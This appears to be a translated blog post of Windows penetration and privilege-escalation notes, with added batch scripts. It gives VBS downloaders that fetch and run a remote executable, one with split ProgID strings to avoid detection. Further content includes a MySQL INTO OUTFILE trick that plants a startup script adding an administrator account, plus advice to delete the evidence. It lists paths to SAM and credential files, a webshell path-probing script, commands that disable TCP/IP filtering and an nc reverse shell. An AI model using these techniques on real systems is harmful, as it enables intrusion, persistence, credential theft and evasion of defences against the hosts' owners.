  • Windows penetration and privilege escalation summary (2)

    VBS downloader:

    1:

    Each echo line appends one VBScript statement to c:\windows\cftmon.vbs; the last line runs the finished script. The xPost object must be created and the GET request sent before the ADODB.Stream lines, otherwise sGet.Write(xPost.responseBody) fails, so those three statements are included here (the URL is a placeholder). Mode = 3 is read/write, Type = 1 is binary, and the 2 passed to SaveToFile overwrites an existing file.

    echo Set xPost = createObject("Microsoft.XMLHTTP") >>c:\windows\cftmon.vbs
    echo xPost.Open "GET","http://xxxx/e.exe",0 >>c:\windows\cftmon.vbs
    echo xPost.Send() >>c:\windows\cftmon.vbs
    echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
    echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
    echo sGet.Type = 1 >>c:\windows\cftmon.vbs
    echo sGet.Open() >>c:\windows\cftmon.vbs
    echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
    echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
    echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
    echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
    cscript c:\windows\cftmon.vbs

    2:

    On Error Resume Next:Dim iRemote,iLocal,s1,s2
    iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
    s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
    Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
    Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
    sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

    Save this as c:\down.vbs; the first argument is the remote URL, the second the local file to write. The ProgIDs are built from string fragments so that "Microsoft.XMLHTTP" and "ADODB.Stream" never appear literally in the file. Note that LCase lowercases both arguments, so a case-sensitive remote path will break; drop the LCase calls if that matters.

    cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

    MySQL INTO OUTFILE into the Startup folder:

    create table a (cmd text);
    insert into a values ("set wshshell=createobject (""wscript.shell"")");
    insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
    insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
    select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs";

    The file is written by the mysqld service account, so the account needs the FILE privilege and write access to the folder (on MySQL 5.1 and later, secure_file_priv must also allow that directory). Because ENCLOSED BY is empty by default, INTO OUTFILE leaves the double quotes untouched, which is why the doubled quotes inside the INSERT values come out as single quotes in the VBS. The script runs with the privileges of the next user who logs on interactively; on an English-locale system the path is C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.vbs. Drop table a afterwards so it does not remain as evidence.

    Cmd directory tricks:

    List all directories under d:\freehost:

    for /d %i in (d:\freehost\*) do @echo %i

    Show only the folders in the current directory whose names are 1 to 3 characters long:

    for /d %i in (???) do @echo %i

    With the current directory as the search root, list every EXE in it and in all subdirectories:

    for /r %i in (*.exe) do @echo %i

    With a specified directory as the search root, list all files in it and in all subdirectories:

    for /r "f:\freehost\hmadesign\web" %i in (*.*) do @echo %i

    This prints the contents of c:\1.txt line by line, because /f reads the file as input:

    for /f %i in (c:\1.txt) do echo %i

    Without a delims= option, for /f splits each line on spaces and tabs and %i receives only the first token, so a line such as C:\Program Files\x prints as C:\Program; use "delims=" to get whole lines. It also skips blank lines and lines starting with ";". The character after delims= is the delimiter (here a space), and tokens= selects which field to take:

    for /f "tokens=2 delims= " %i in (a.txt) do echo %i

    At the prompt the loop variable is written %i; inside a batch file it must be %%i.

    Common paths on Windows systems (c: can be swapped for d: or e:; virtual hosting panels such as 星外 (FreeHost) and 华众 (hzhost) usually put everything on d:):

    c:\windows\php.ini
    c:\boot.ini
    c:\1.txt
    c:\a.txt
    c:\CMailServer\config.ini
    c:\CMailServer\CMailServer.exe
    c:\CMailServer\WebMail\index.asp
    c:\program files\CMailServer\CMailServer.exe
    c:\program files\CMailServer\WebMail\index.asp
    C:\WinWebMail\SysInfo.ini
    C:\WinWebMail\Web\default.asp
    C:\WINDOWS\FreeHost32.dll
    C:\WINDOWS\7i24\iislog4.exe
    C:\WINDOWS\7i24\tool.exe
    c:\hzhost\databases\url.asp
    c:\hzhost\hzclient.exe
    C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
    C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
    C:\WINDOWS\web.config
    c:\web\index.html
    c:\www\index.html
    c:\WWWROOT\index.html
    c:\website\index.html
    c:\web\index.asp
    c:\www\index.asp
    c:\wwwsite\index.asp
    c:\WWWROOT\index.asp
    c:\web\index.php
    c:\www\index.php
    c:\WWWROOT\index.php
    c:\WWWsite\index.php
    c:\web\default.html
    c:\www\default.html
    c:\WWWROOT\default.html
    c:\website\default.html
    c:\web\default.asp
    c:\www\default.asp
    c:\wwwsite\default.asp
    c:\WWWROOT\default.asp
    c:\web\default.php
    c:\www\default.php
    c:\WWWROOT\default.php
    c:\WWWsite\default.php
    C:\Inetpub\wwwroot\pagerror.gif
    c:\windows\notepad.exe
    c:\winnt\notepad.exe
    C:\Program Files\Microsoft Office\OFFICE10\winword.exe
    C:\Program Files\Microsoft Office\OFFICE11\winword.exe
    C:\Program Files\Microsoft Office\OFFICE12\winword.exe
    C:\Program Files\Internet Explorer\IEXPLORE.EXE
    C:\Program Files\winrar\rar.exe
    C:\Program Files\360\360Safe\360safe.exe
    C:\Program Files\360Safe\360safe.exe
    C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
    c:\ravbin\store.ini
    c:\rising.ini
    C:\Program Files\Rising\Rav\RsTask.xml
    C:\Documents and Settings\All Users\Start Menu\desktop.ini
    C:\Documents and Settings\Administrator\My Documents\Default.rdp
    C:\Documents and Settings\Administrator\Cookies\index.dat
    C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
    C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
    C:\Documents and Settings\Administrator\My Documents\1.txt
    C:\Documents and Settings\Administrator\桌面\1.txt
    C:\Documents and Settings\Administrator\My Documents\a.txt
    C:\Documents and Settings\Administrator\桌面\a.txt
    C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
    E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
    C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
    C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
    C:\Program Files\Symantec\SYMEVENT.INF
    C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
    C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
    C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
    C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
    C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
    C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
    C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
    C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
    C:\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
    C:\Program Files\MySQL\MySQL Server 5.0\COPYING
    C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
    C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
    c:\MySQL\MySQL Server 4.1\bin\mysql.exe
    c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
    C:\Program Files\Oracle\oraconfig\Lpk.dll
    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
    C:\WINDOWS\system32\inetsrv\w3wp.exe
    C:\WINDOWS\system32\inetsrv\inetinfo.exe
    C:\WINDOWS\system32\inetsrv\MetaBase.xml
    C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
    C:\WINDOWS\system32\config\default.LOG
    C:\WINDOWS\system32\config\sam
    C:\WINDOWS\system32\config\system
    c:\CMailServer\config.ini
    c:\program files\CMailServer\config.ini
    c:\tomcat6\tomcat6\bin\version.sh
    c:\tomcat6\bin\version.sh
    c:\tomcat\bin\version.sh
    c:\program files\tomcat6\bin\version.sh
    C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
    c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
    c:\Apache2\Apache2\bin\Apache.exe
    c:\Apache2\bin\Apache.exe
    c:\Apache2\php\license.txt
    C:\Program Files\Apache Group\Apache2\bin\Apache.exe
    c:\Program Files\QQ2007\qq.exe
    c:\Program Files\Tencent\qq\User.db
    c:\Program Files\Tencent\qq\qq.exe
    c:\Program Files\Tencent\qq\bin\qq.exe
    c:\Program Files\Tencent\qq2009\qq.exe
    c:\Program Files\Tencent\qq2008\qq.exe
    c:\Program Files\Tencent\qq2010\bin\qq.exe
    c:\Program Files\Tencent\qq\Users\All Users\Registry.db
    C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
    c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
    c:\Program Files\Tencent\RTXServer\AppConfig.xml
    C:\Program Files\Foxmal\Foxmail.exe
    C:\Program Files\Foxmal\accounts.cfg
    C:\Program Files\Tencent\Foxmal\Foxmail.exe
    C:\Program Files\Tencent\Foxmal\accounts.cfg
    C:\Program Files\LeapFTP 3.0\LeapFTP.exe
    C:\Program Files\LeapFTP\LeapFTP.exe
    c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
    c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
    C:\Program Files\FlashFXP\FlashFXP.ini
    C:\Program Files\FlashFXP\flashfxp.exe
    c:\Program Files\Oracle\bin\regsvr32.exe
    c:\Program Files\腾讯游戏\QQGAME\readme.txt
    c:\Program Files\Tencent\腾讯游戏\QQGAME\readme.txt
    c:\Program Files\Tencent\QQGAME\readme.txt
    C:\Program Files\StormII\Storm.exe

    Relative paths of common website configuration files (relative to the script that includes or reads them):

    /config.php
    ../../config.php
    ../config.php
    ../../../config.php
    /config.inc.php
    ./config.inc.php
    ../../config.inc.php
    ../config.inc.php
    ../../../config.inc.php
    /conn.php
    ./conn.php
    ../../conn.php
    ../conn.php
    ../../../conn.php
    /conn.asp
    ./conn.asp
    ../../conn.asp
    ../conn.asp
    ../../../conn.asp
    /config/config.php
    ../../config/config.php
    ../config/config.php
    ../../../config/config.php
    /config/config.inc.php
    ./config/config.inc.php
    ../../config/config.inc.php
    ../config/config.inc.php
    ../../../config/config.inc.php
    /config/conn.php
    ./config/conn.php
    ../../config/conn.php
    ../config/conn.php
    ../../../config/conn.php
    /config/conn.asp
    ./config/conn.asp
    ../../config/conn.asp
    ../config/conn.asp
    ../../../config/conn.asp
    /data/config.php
    ../../data/config.php
    ../data/config.php
    ../../../data/config.php
    /data/config.inc.php
    ./data/config.inc.php
    ../../data/config.inc.php
    ../data/config.inc.php
    ../../../data/config.inc.php
    /data/conn.php
    ./data/conn.php
    ../../data/conn.php
    ../data/conn.php
    ../../../data/conn.php
    /data/conn.asp
    ./data/conn.asp
    ../../data/conn.asp
    ../data/conn.asp
    ../../../data/conn.asp
    /include/config.php
    ../../include/config.php
    ../include/config.php
    ../../../include/config.php
    /include/config.inc.php
    ./include/config.inc.php
    ../../include/config.inc.php
    ../include/config.inc.php
    ../../../include/config.inc.php
    /include/conn.php
    ./include/conn.php
    ../../include/conn.php
    ../include/conn.php
    ../../../include/conn.php
    /include/conn.asp
    ./include/conn.asp
    ../../include/conn.asp
    ../include/conn.asp
    ../../../include/conn.asp
    /inc/config.php
    ../../inc/config.php
    ../inc/config.php
    ../../../inc/config.php
    /inc/config.inc.php
    ./inc/config.inc.php
    ../../inc/config.inc.php
    ../inc/config.inc.php
    ../../../inc/config.inc.php
    /inc/conn.php
    ./inc/conn.php
    ../../inc/conn.php
    ../inc/conn.php
    ../../../inc/conn.php
    /inc/conn.asp
    ./inc/conn.asp
    ../../inc/conn.asp
    ../inc/conn.asp
    ../../../inc/conn.asp
    /index.php
    ./index.php
    ../../index.php
    ../index.php
    ../../../index.php
    /index.asp
    ./index.asp
    ../../index.asp
    ../index.asp
    ../../../index.asp
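    The batch script below is an added example and is not part of the original post. It puts the for /f and for /d idioms from the "Cmd directory tricks" section to work on the two lists above: it reads candidate absolute paths from a list file and reports which ones exist, repeats the check on other drive letters, and then looks for the relative config-file names under a web root. The list file contents, the drives d: and e:, and the web root C:\Inetpub\wwwroot are assumptions made for the example; on a real host the whole path list would be pasted into the file and the web root taken from the vulnerable site.

```batch
@echo off
rem Added example, not from the original post. Run from a cmd prompt, or
rem save as a .bat and launch it from a webshell, to see which of the
rem candidate paths from the lists above exist on this host.
setlocal enabledelayedexpansion

rem Constructed candidate list (assumption); paste the full list here.
set "LIST=%TEMP%\paths.txt"
> "%LIST%" (
  echo c:\boot.ini
  echo c:\windows\php.ini
  echo C:\WINDOWS\system32\inetsrv\MetaBase.xml
  echo C:\Program Files\MySQL\MySQL Server 5.0\my.ini
  echo C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
  echo C:\WINDOWS\system32\config\sam
)

echo == absolute paths
rem "delims=" keeps the whole line; a bare for /f would cut each path at
rem the first space and test "C:\Program" instead of "C:\Program Files\...".
for /f "usebackq delims=" %%p in ("%LIST%") do (
  if exist "%%p" (echo [+] %%p) else (echo [-] %%p)
)

echo == same names on other drives, where hosting panels often live
for %%d in (d e) do (
  for /f "usebackq delims=" %%p in ("%LIST%") do (
    rem Replace the drive letter: drop the first character, prefix %%d.
    set "q=%%p"
    set "q=%%d!q:~1!"
    if exist "!q!" echo [+] !q!
  )
)

echo == relative config files under the web root
rem Assumed web root; the ../ entries in the list are relative to the
rem vulnerable script, so walk the usual subfolders from the root instead.
set "ROOT=C:\Inetpub\wwwroot"
for %%f in (config.php config.inc.php conn.php conn.asp) do (
  for %%s in (. config data include inc) do (
    if exist "%ROOT%\%%s\%%f" echo [+] %ROOT%\%%s\%%f
  )
)

del "%LIST%"
endlocal
```

    Inside the script every loop variable is written %%p rather than the %p used at the prompt, and delayed expansion (!q!) is needed because the drive-letter substitution changes q inside a single parenthesised block.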

    Removing TCP/IP filtering:

    TCP/IP filtering is stored in three places in the registry (CurrentControlSet is a link to one of the numbered control sets, so one of the three is the same key seen twice; editing all three is harmless). The switch itself is the EnableSecurityFilters value under Tcpip\Parameters, and the per-adapter port lists (TCPAllowedPorts, UDPAllowedPorts, RawIPAllowedProtocols) sit under Tcpip\Parameters\Interfaces\{adapter GUID}:

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

    Export each key with the following commands (the first export targets ControlSet001; the original listing exported CurrentControlSet twice and ControlSet001 never):

    regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
    regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
    regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

    Then, in each of the three files, change:

    "EnableSecurityFilters"=dword:00000001

    to:

    "EnableSecurityFilters"=dword:00000000

    and import the three files back silently with:

    regedit -s D:\a.reg
    regedit -s D:\b.reg
    regedit -s D:\c.reg

    The change only takes effect after a reboot, and because the port lists are left untouched, the filtering can be re-enabled just as easily by setting the value back to 1.
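    The same change driven with reg.exe, as an added example that is not part of the original post: it loops over the three control sets listed above, skips any that lack the value rather than creating keys, exports a backup of Tcpip\Parameters to %TEMP% and sets EnableSecurityFilters to 0 (or back to 1 when run with the argument on), then reads the value back to confirm. The script name tcpipfilter.bat and the backup location are assumptions made for the example; it needs an administrative shell and, like the .reg route, the new setting applies only after a reboot.

```batch
@echo off
rem Added example, not from the original post: toggle TCP/IP filtering with
rem reg.exe instead of exporting, hand-editing and re-importing .reg files.
rem Usage: tcpipfilter.bat off   (or: tcpipfilter.bat on)
setlocal
set "NEWVAL=0"
if /i "%~1"=="on" set "NEWVAL=1"

for %%s in (ControlSet001 ControlSet002 CurrentControlSet) do (
  set "KEY=HKLM\SYSTEM\%%s\Services\Tcpip\Parameters"
  call :apply "%%s"
)
endlocal
goto :eof

:apply
rem Skip control sets that do not exist instead of creating them with reg add.
reg query "%KEY%" /v EnableSecurityFilters >nul 2>&1
if errorlevel 1 (
  echo [-] %~1: no EnableSecurityFilters value, skipped
  goto :eof
)
rem Keep a backup of the key (assumed location) so the filter can be restored.
if exist "%TEMP%\tcpip_%~1.reg" del "%TEMP%\tcpip_%~1.reg"
reg export "%KEY%" "%TEMP%\tcpip_%~1.reg" >nul
reg add "%KEY%" /v EnableSecurityFilters /t REG_DWORD /d %NEWVAL% /f >nul
rem Read the value back; token 3 of the matching line is the hex value.
for /f "tokens=3" %%v in ('reg query "%KEY%" /v EnableSecurityFilters ^| findstr /i EnableSecurityFilters') do (
  echo [+] %~1: EnableSecurityFilters is now %%v
)
goto :eof
```

    The backup files can be restored with regedit -s, exactly as in the manual procedure above, which is also the quickest way to put the original filter back once the session is over.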

    Webshell privilege-escalation tips:

    Cmd path:

    c:\windows\temp\cmd.exe

    Nc is in the same directory; for example, a reverse cmd shell entered as one line in the webshell's command box:

    "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

    usually fails.

    Instead, set the webshell's cmd path to:

    c:\windows\temp\nc.exe

    and put only the arguments in the command field:

    -vv ip 999 -e c:\windows\temp\cmd.exe

    and it works. That is not the main point, though:

    running pr.exe or Churrasco.exe usually needs the same trick to succeed: set the exploit as the cmd path and pass its arguments in the command field.

    Calling RAR from the command line to pack a folder:

    rar a -k -r -s -m3 c:\1.rar c:\folde

    a adds files to the archive, -k locks it, -r recurses subdirectories, -s creates a solid archive and -m3 selects normal compression; rar.exe lives in the WinRAR program folder (C:\Program Files\winrar\rar.exe).
     
  • Original address: https://www.cnblogs.com/milantgh/p/3601866.html